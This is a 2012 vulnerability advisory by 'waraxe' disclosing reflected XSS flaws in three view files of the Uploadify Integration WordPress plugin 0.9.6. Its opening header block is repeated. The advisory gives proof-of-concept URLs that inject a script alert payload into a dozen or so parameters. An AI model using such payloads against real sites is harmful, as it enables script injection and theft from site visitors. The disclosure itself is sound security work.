Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
Uploadify Integration allows you to insert a jQuery uploadify uploader into your
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user
meta, an option, or temporary depending on the metaType selected by the shortcode.
Allows more than one shortcode per page.
Affected is Uploadify Integration 0.9.6, older versions may be affected as well.
########################################################################
#######
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
########################################################################
#######
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
########################################################################
#######
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
########################################################################
#######
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
########################################################################
#######
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
########################################################################
#######
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
========================================================================
=======
Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
Uploadify Integration allows you to insert a jQuery uploadify uploader into your
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user
meta, an option, or temporary depending on the metaType selected by the shortcode.
Allows more than one shortcode per page.
http://wordpress.org/extend/plugins/uploadify-integration/
Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
Affected is Uploadify Integration 0.9.6, older versions may be affected as well.
########################################################################
#######
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
########################################################################
#######
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,
83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83
,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,
83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,
83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88
,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83
,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,8
3))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,8
3))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))<
/script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</
script>
Result: XSS payload execution can be observed
########################################################################
#######
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
########################################################################
#######
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))<
/script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83
))</script>
Result: XSS payload execution can be observed
########################################################################
#######
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
########################################################################
#######
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/sc
ripts/
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</scr
ipt>
Result: XSS payload execution can be observed
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
[ reply ]